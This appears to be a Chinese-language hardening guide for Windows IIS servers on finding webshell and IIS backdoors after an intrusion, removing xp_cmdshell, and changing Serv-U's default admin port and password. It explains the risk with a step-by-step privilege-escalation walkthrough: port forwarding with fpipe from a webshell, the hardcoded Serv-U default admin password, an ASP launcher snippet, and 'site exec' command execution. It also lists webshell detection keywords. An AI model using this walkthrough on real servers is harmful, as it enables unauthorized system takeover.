改变serv-u的默认端口和帐号

一个入侵者进入一个系统以后,肯定会想方设法留下后门,因此我们发现系统被入侵后的第一件事情就是拔掉网线,查出入侵者留下的后门. 可能留的后门一、脚本后门这类后门比较好查找,我们可以用windows自带的文件搜索功能来搜索文件中包含特定字符串的文件,asp木马可搜索shell.application,WSCRIPT.SHELL,WSCRIPT.NETWORK,GetTempName,shell,cmd.exe或其他一些可疑字符串.php木马可搜索system,passthru,exec,shell_exec,popen等等.cgi木马可搜索system或syswrite,jsp木马可搜索exec,cmd或request.getParameter等. 二、 iis后门利用iis的缺陷配置system权限的asp后门的几个方法  1 检查管理员组里有没有可疑的帐号， 防止攻击者把访问iis的匿名帐号iusr_name加入administrators组 2 检查iis应用程序保护,看看设置是否正确 3 检查asp.dll是否正常，有没有被加到数组InProcessIsapiApps中 cscript c:/inetpub/adminscripts/adsutil.vbs GET /W3SVC/InprocessIsapiApps  4 检查是否有可疑的映射,防止入侵者构造特殊的ISAPI，并把该ISAPI添加到InProcessIsapiApps数组中,那么向服务器请求该扩展名类型文件时就会在服务器上以local system权限执行该ISAPI cscript c:/inetpub/adminscripts/adsutil.vbs get /w3svc/scriptmaps 三、检查是否有克隆帐号，利用工具cca.exe来检查四、检查服务器是否开有可疑的端口或进程，要用到的工具fport,ps,tskill,sc 五、服务器上面如果有serv-u，改变serv-u默认的监听端口127.0.0.1:43958和默认的管理员密码   LocalSetupPortNo=12315  设置默认端口改变密码用云舒同学写的repass 关于webshell配合serv-u提升权限的问题得到webshell以后,上传fpipe及tskill,fpipe用于端口重定向，tskill用于杀掉进程 serv-u默认监听127.0.0.1:43958，所以只有在本机才能连接这个管理端口。serv-u默认管理账号是LocalAdministrator,默认密码是"#l@$ak#.lk;0@P"，这个密码在同一个版本中是固定的，也许在不同的版本中也是固定的。假如目标机器IP是192.168.30.10，假如你已经有了一个目标机器的普通权限的SHELL，那么你在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1，然后在你自己的机器，用"serv-u admin"新建SERVER，192.168.30.10端口写12345User：LocalAdministratorPass："#l@$ak#.lk;0@P"那么目标机器的serv-u就归你管了。端口重定向的asp程序Set oScript = Server.CreateObject("WSCRIPT.SHELL")oScript.Run (server.mappath("fpipe.exe")&" -v -l 20 -r 43958 127.0.0.1") 利用管理员权限的账号执行命令quote site exec net.exe user LocalSetupPortNo=12315  设置默认端口六、设置mssql的一些危险的存储过程，如xp_cmdshell 去掉xp_cmdshell扩展过程的方法是使用如下语句以下是代码:if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)exec sp_dropextendedproc N'[dbo].[xp_cmdshell]' 有些入侵者可能会尝试恢复 xp_cmdshell 我们可以把xplog70.dll删除或者改名，断了入侵者的念头.